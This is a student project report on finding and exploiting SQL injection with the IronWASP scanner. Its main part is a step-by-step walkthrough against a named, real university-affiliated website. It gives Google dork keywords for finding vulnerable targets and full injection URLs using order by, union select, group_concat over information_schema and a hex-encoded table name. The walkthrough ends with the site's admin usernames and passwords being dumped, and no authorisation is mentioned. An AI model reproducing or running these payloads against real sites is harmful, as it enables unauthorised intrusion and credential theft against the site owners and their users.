You are on page 1of 14

Project Report

IRONWASP

Class Teacher
Sir Waqar Ahmed
PAF KIET

Submitted by
Muhammad BurhanShafaat

54596

DEPARTMENT OF COMPUTER SCIENCE
PAF Karachi Institute of Economics and Technology
28-D, Block 6, P.E.C.H.S, Karachi – 75400
Dec 2014

This report discusses SQL injection vulnerability identification and attacking. It took several weeks of immense hard work and tiredness to complete this project. Therefore.PREFACE It gives me a sense of satisfaction and pleasure at the same time while writing the preface for the IRONWASPproject report. It requires a lot of effort to avoid these attacks. I have presented the project report in a way which is accessible to everyone. Explanations of concepts and principles are concise and written in clear and simple language with supportive illustrations where required. Different diagrams are provided to make this report even more logical and understandable for the reader. My intention has been to produce a report which covers completely all the aspects of this project. This report is carefully designed to offer information appropriate for SQL Injection vulnerability. As use of the computers in industry. Avoiding attacks on information and network wouldn’t be that easy. A thorough study has been carried out of the topic. the question of information and system security arises. All the topics are comprehensively dealt with to give reader a firm grounding in the issue. education and many other fields of life have become very common. commerce. Muhammad Burhan ii . All the material has been collected in relevance with the SQL injection vulnerability.

who throughout my studies help me and guide me. I also acknowledge my all teachers. I thank Almighty Allah who praised me with the ability to think.ACKNOWLEDGMENT First of all. departmental staff. I am grateful to my teacher Mr. I then wish to show appreciation to all those individuals who have helped me in any way. work and deliver what I was assigned to do. Without His mercy it was not possible at all. in the making of this project Muhammad Burhan iii . Secondly. and university staff. Waqar Ahmed who was always there to guide me and sort out my problems.

TABLE OF CONTENTS PREFACE ii ACKNOWLEDGEMENTS iii TABLE OF CONTENTS iv Chapter 1 INTRODUCTION 01 Objective Theoretical Background Project Scope 01 01 02 IRONWASP 03 Introduction to Iron WASP Reason for Iron WASP Selection 03 04 LAUNCHING ATTACK 05 How to Find Target? Target Start Attack 05 05 07 CONCLUSION 11 Conclusion 11 1.1 Appendix A A.3 Chapter 4 4.2 3.1 2.1 REFERENCES WEB References 12 12 iv .3 Chapter 2 2.1 3.2 1.1 1.2 Chapter 3 3.

What is software vulnerability? Software vulnerability is a security flaw. 1. It provides the objective.g. 1.1 Objective The aim of my project is to attack on a website using IRONWASP for SQL Injection vulnerability detection and also attack on effected website using SQL Injection. What is IronWASP? v . glitch.INTRODUCTION 1 Introduction This chapter gives a brief introduction to the project. theoretical background and project scope.2 Theoretical Background What is SQL injection? SQL injection is a code injection technique. in which malicious SQL statements are inserted into an entry field for execution (e. or weakness found insoftware or in an operating system (OS) that can lead to security concerns. to dump the database contents to the attacker). An example of a software flaw is a buffer overflow. used to attack data-driven applications.

1. 2.3 Project Scope 1. 3. vi .Perform attack using SQL Injection.Identify vulnerability using “Iron Wasp”.IronWASP(Iron Web application Advanced Security testing Platform) is one of the world's best web vulnerability scanners.To understand and demonstrate the working of “Iron Wasp”.

It is designed to make automated scanning and testing an easy process. a lot of the tool's features are simple enough to be used by absolute beginners. It is developed by LavakumarKuppan. vii . It provides introduction and reason for the selection of Iron WASP. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform.1 Introduction to Iron WASP WASP(Iron Web application Advanced Security testing Platform) is one of the world's best web vulnerability scanners.CHAPTER 2 IRONWASP 2 Iron WASP This chapter gives you introduction to Iron WASP. It is an open source system for web application vulnerability testing. 2. It is designed to be customizable to the extent where users can create their own custom security scanners using it.

no security expertise required. 4. 7.False Negatives detection support. viii .Supports recording Login sequence.It's Free and Open source. 6.NET.GUI based and very easy to use.Reporting in both HTML and RTF formats.Figure 1: Iron WASP Interface 2. 8.False Positives detection support. 11.Comes bundled with a growing number of Modules built by researchers in the security community. 10. 3. 2. C# or VB.Industry leading built-in scripting engine that supports Python and Ruby. 5.Powerful and effective scanning engine.Checks for over 25 different kinds of web vulnerabilities.2 Reasons for Iron WASP Selection 1. 9.Extensible via plug-ins or modules in Python. Ruby.

2. ix .google.edu.1 How to find the target? Search on www.thelaureate.2 Target My target is The Laureate Business School (website: http://www.pk) as shown in figure 2 which is affiliated with RPHAH International University.CHAPTER 3 LAUNCHING ATTACK 2 Launching Attack This chapter gives you idea how to launch attack? It provides details regarding the target and launching the attack.com using following key words will help you to find target: inurl: php?category= inurl: php?id= or with similar keywords 2.

BSc. Figure 3: SQL Injection Vulnerability Detected 2. http://www.e. Figure 2: Target website. BBA.thelaureate. Use order by clause and increase column number 1.edu.The university offers several under graduate programs (BS.pk). etc) as well as graduate programs (MBA.3 Start Attack Step 1: Use order by clause to find the number columns in table. 3 … n till you get error. For Example: x . Figure 3 shows that SQL injection detected on the university website (i. etc). 2.

thelaureate.thelaureate.php?id=10+order+by+7 Figure 4 show that on 7th column we find following error as shown in figure 4 which means that we have only 6 columns in table which is displaying data.edu. Figure 4: Shows error on 7th column.pk/contents.5.pk/contents.6+order+by+1 Figure 5: Displayed Columns.php?id=10+union+select+1. To find the columns that are displaying on web page we have use a “union query” for example: http://www.edu.edu.pk/contents.http://www.thelaureate.edu.2.pk/contents. To group_concat function is used to display all table names of the given schema.4.edu.php?id=10+order+by+2 http://www.3.pk/contents. Step 2: Finding columns that are displaying on page.thelaureate. For example: xi .thelaureate. Step 3: Using group_concat function.php?id=10+order+by+3 : : http://www.php?id=10+order+by+1 http://www.

5.pk/contents. Group_concat will be use to display the column names. navigation_bk.pk/contents.3. So I use the below mentioned URL to retrieve data.edu. Step 6: Retrieving data.group_concat(table_n ame)+. image_gallery. Figure 6: Table names. images_listing. Figure 8 shows the results of admin table.e-news. email_management. Step 4: Find hex of the target table.columns+where+table_name=0x61646d696e+order +by+1 Figure 7: Shows the column names of admin table.6+from+information_schema.thelaureate. Therefore I find the hex code of “admin” which is 61646d696e.2. The admin table is looking more interesting.thelaureate. Step 5: Finding column names of the table.group_concat(column _name)+. username and password). We have to enter hex code for table name in the query to execute this successfully.e. In last step I successfully retrieved the column names (i.2. For example: http://www.edu.php?id=10+union+select+1.http://www. xii .6+from+information_schema. notice_board and pages”. navigation.3. news_and_events.5.tables+where+table_schema=database()+order+by+1 The above link displayed few tables belongs the current schema: “admin. email_group.php?id=10+union+select+1.

Step 7: Beyond this is not ethical. views etc) using SQL injection.2.http://www. I feel that moving ahead like delete.+username+. So we can insert. Therefore the desktop and web applications should be build on standards to avoid attacks.5. Chapter 3 CONCLUSION 3 Conclusion As you have seen that I demonstrate the SQL injection technique.pk/contents.thelaureate.+password +. Now-a-days there are several software products available which show the availability of vulnerability in web and desktop applications. modify and inserting data into tables is not ethical.6+from+admin+order+by+1 Figure 8: Shows the data of admin table. xiii .php?id=10+union+select+1. update and delete any data and as well as database objects (like tables.edu.

thelaureate.APPENDIX A WEB REFERENCES Web References [1] http://www.aspx (Convert String to Hex) xiv .edu.com/string-hex.pk (Target Website) [2] http://string-functions.